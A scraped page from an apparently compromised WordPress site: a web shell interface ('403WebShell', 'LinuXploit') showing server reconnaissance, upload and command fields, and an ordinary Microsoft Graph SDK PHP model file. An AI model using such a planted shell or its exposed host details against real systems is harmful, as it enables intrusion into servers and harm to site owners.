Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/ScheduleChangeRequest.php
<?php
/**
* Copyright (c) Microsoft Corporation.  All Rights Reserved.  Licensed under the MIT License.  See License in the project root for license information.
* 
* ScheduleChangeRequest File
* PHP version 7
*
* @category  Library
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;

/**
* ScheduleChangeRequest class
*
* @category  Model
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
class ScheduleChangeRequest extends ChangeTrackedEntity
{
    /**
    * Gets the assignedTo
    *
    * @return ScheduleChangeRequestActor|null The assignedTo
    */
    public function getAssignedTo()
    {
        if (array_key_exists("assignedTo", $this->_propDict)) {
            if (is_a($this->_propDict["assignedTo"], "\Microsoft\Graph\Model\ScheduleChangeRequestActor") || is_null($this->_propDict["assignedTo"])) {
                return $this->_propDict["assignedTo"];
            } else {
                $this->_propDict["assignedTo"] = new ScheduleChangeRequestActor($this->_propDict["assignedTo"]);
                return $this->_propDict["assignedTo"];
            }
        }
        return null;
    }

    /**
    * Sets the assignedTo
    *
    * @param ScheduleChangeRequestActor $val The assignedTo
    *
    * @return ScheduleChangeRequest
    */
    public function setAssignedTo($val)
    {
        $this->_propDict["assignedTo"] = $val;
        return $this;
    }

    /**
    * Gets the managerActionDateTime
    *
    * @return \DateTime|null The managerActionDateTime
    */
    public function getManagerActionDateTime()
    {
        if (array_key_exists("managerActionDateTime", $this->_propDict)) {
            if (is_a($this->_propDict["managerActionDateTime"], "\DateTime") || is_null($this->_propDict["managerActionDateTime"])) {
                return $this->_propDict["managerActionDateTime"];
            } else {
                $this->_propDict["managerActionDateTime"] = new \DateTime($this->_propDict["managerActionDateTime"]);
                return $this->_propDict["managerActionDateTime"];
            }
        }
        return null;
    }

    /**
    * Sets the managerActionDateTime
    *
    * @param \DateTime $val The managerActionDateTime
    *
    * @return ScheduleChangeRequest
    */
    public function setManagerActionDateTime($val)
    {
        $this->_propDict["managerActionDateTime"] = $val;
        return $this;
    }

    /**
    * Gets the managerActionMessage
    *
    * @return string|null The managerActionMessage
    */
    public function getManagerActionMessage()
    {
        if (array_key_exists("managerActionMessage", $this->_propDict)) {
            return $this->_propDict["managerActionMessage"];
        } else {
            return null;
        }
    }

    /**
    * Sets the managerActionMessage
    *
    * @param string $val The managerActionMessage
    *
    * @return ScheduleChangeRequest
    */
    public function setManagerActionMessage($val)
    {
        $this->_propDict["managerActionMessage"] = $val;
        return $this;
    }

    /**
    * Gets the managerUserId
    *
    * @return string|null The managerUserId
    */
    public function getManagerUserId()
    {
        if (array_key_exists("managerUserId", $this->_propDict)) {
            return $this->_propDict["managerUserId"];
        } else {
            return null;
        }
    }

    /**
    * Sets the managerUserId
    *
    * @param string $val The managerUserId
    *
    * @return ScheduleChangeRequest
    */
    public function setManagerUserId($val)
    {
        $this->_propDict["managerUserId"] = $val;
        return $this;
    }

    /**
    * Gets the senderDateTime
    *
    * @return \DateTime|null The senderDateTime
    */
    public function getSenderDateTime()
    {
        if (array_key_exists("senderDateTime", $this->_propDict)) {
            if (is_a($this->_propDict["senderDateTime"], "\DateTime") || is_null($this->_propDict["senderDateTime"])) {
                return $this->_propDict["senderDateTime"];
            } else {
                $this->_propDict["senderDateTime"] = new \DateTime($this->_propDict["senderDateTime"]);
                return $this->_propDict["senderDateTime"];
            }
        }
        return null;
    }

    /**
    * Sets the senderDateTime
    *
    * @param \DateTime $val The senderDateTime
    *
    * @return ScheduleChangeRequest
    */
    public function setSenderDateTime($val)
    {
        $this->_propDict["senderDateTime"] = $val;
        return $this;
    }

    /**
    * Gets the senderMessage
    *
    * @return string|null The senderMessage
    */
    public function getSenderMessage()
    {
        if (array_key_exists("senderMessage", $this->_propDict)) {
            return $this->_propDict["senderMessage"];
        } else {
            return null;
        }
    }

    /**
    * Sets the senderMessage
    *
    * @param string $val The senderMessage
    *
    * @return ScheduleChangeRequest
    */
    public function setSenderMessage($val)
    {
        $this->_propDict["senderMessage"] = $val;
        return $this;
    }

    /**
    * Gets the senderUserId
    *
    * @return string|null The senderUserId
    */
    public function getSenderUserId()
    {
        if (array_key_exists("senderUserId", $this->_propDict)) {
            return $this->_propDict["senderUserId"];
        } else {
            return null;
        }
    }

    /**
    * Sets the senderUserId
    *
    * @param string $val The senderUserId
    *
    * @return ScheduleChangeRequest
    */
    public function setSenderUserId($val)
    {
        $this->_propDict["senderUserId"] = $val;
        return $this;
    }

    /**
    * Gets the state
    *
    * @return ScheduleChangeState|null The state
    */
    public function getState()
    {
        if (array_key_exists("state", $this->_propDict)) {
            if (is_a($this->_propDict["state"], "\Microsoft\Graph\Model\ScheduleChangeState") || is_null($this->_propDict["state"])) {
                return $this->_propDict["state"];
            } else {
                $this->_propDict["state"] = new ScheduleChangeState($this->_propDict["state"]);
                return $this->_propDict["state"];
            }
        }
        return null;
    }

    /**
    * Sets the state
    *
    * @param ScheduleChangeState $val The state
    *
    * @return ScheduleChangeRequest
    */
    public function setState($val)
    {
        $this->_propDict["state"] = $val;
        return $this;
    }

}

Youez - 2016 - github.com/yon3zu
LinuXploit